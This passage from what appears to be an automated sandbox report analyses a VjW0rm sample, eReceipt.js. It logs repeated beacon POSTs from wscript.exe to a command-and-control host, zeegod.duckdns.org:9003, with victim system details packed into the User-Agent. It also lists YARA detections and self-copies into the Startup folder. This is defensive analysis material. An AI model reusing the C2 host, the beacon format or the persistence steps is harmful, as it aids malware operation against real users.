              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:19.060060024 CEST | 12549 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:18 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:26.259299994 CEST | 13145 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:54.365323067 CEST | 13456 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:54 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:01.507791042 CEST | 13507 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:28.685765028 CEST | 13522 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:28 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:35.833604097 CEST | 13522 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:07.731319904 CEST | 13524 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:07 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:13:15.273410082 CEST | 13531 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:45.824728012 CEST | 13539 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:45 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              2 | 192.168.2.7 | 49781 | 212.193.30.129 | 9003 | C:\Windows\System32\wscript.exe
              Timestamp | kBytes transferred | Direction | Data
              May 17, 2022 23:10:19.069473982 CEST | 1257 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:40.598555088 CEST | 1332 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:40 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:47.762075901 CEST | 10134 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:12.984889984 CEST | 12138 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:12 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:20.157052994 CEST | 12677 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:48.352952003 CEST | 13455 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:47 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:55.543098927 CEST | 13462 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:22.682931900 CEST | 13521 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:22 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:29.735692978 CEST | 13522 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:01.732886076 CEST | 13523 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:01 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:13:08.959758043 CEST | 13524 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:37.797523975 CEST | 13539 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:37 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              3 | 192.168.2.7 | 49788 | 212.193.30.129 | 9003 | C:\Windows\System32\wscript.exe
              Timestamp | kBytes transferred | Direction | Data
              May 17, 2022 23:10:34.885314941 CEST | 1332 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:54.761493921 CEST | 12088 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:54 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:01.956106901 CEST | 12089 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:28.129105091 CEST | 13186 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:28 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:36.348809958 CEST | 13442 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:06.481405973 CEST | 13508 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:06 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:13.751390934 CEST | 13508 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:44.730590105 CEST | 13523 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:44 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:51.777445078 CEST | 13523 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:23.759994030 CEST | 13538 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:23 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:13:30.858787060 CEST | 13538 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache



              Target ID:0
              Start time:23:09:37
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.881750287.000001C6DCC58000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.881056008.000001C6DADBA000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000003.353378984.000001C6DCC2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.880778085.000001C6DAD96000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:high

              Target ID:1
              Start time:23:09:40
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000002.881826906.000001FE441D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:5
              Start time:23:09:51
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.882946701.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000003.815386378.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.881460459.000001B39E783000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000003.390360933.000001B3A054F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.881618761.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000003.815331689.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:high

              Target ID:6
              Start time:23:09:57
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.881056542.000001C97BC3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.880198899.000001C979E13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:7
              Start time:23:10:00
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000007.00000002.882667131.00000280CABE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:9
              Start time:23:10:09
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.880465658.0000011D6BAE4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.881676533.0000011D6D82C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:high

              Target ID:10
              Start time:23:10:15
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000A.00000002.881711321.00000239FAA0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:12
              Start time:23:10:17
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.880769506.00000171E040E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.881396869.00000171E222F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              Target ID:16
              Start time:23:10:25
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.882089368.00000244AF3F0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.880524674.00000244AD5E3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.880727385.00000244AD604000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

              Target ID:18
              Start time:23:10:29
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              Target ID:19
              Start time:23:10:34
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              No disassembly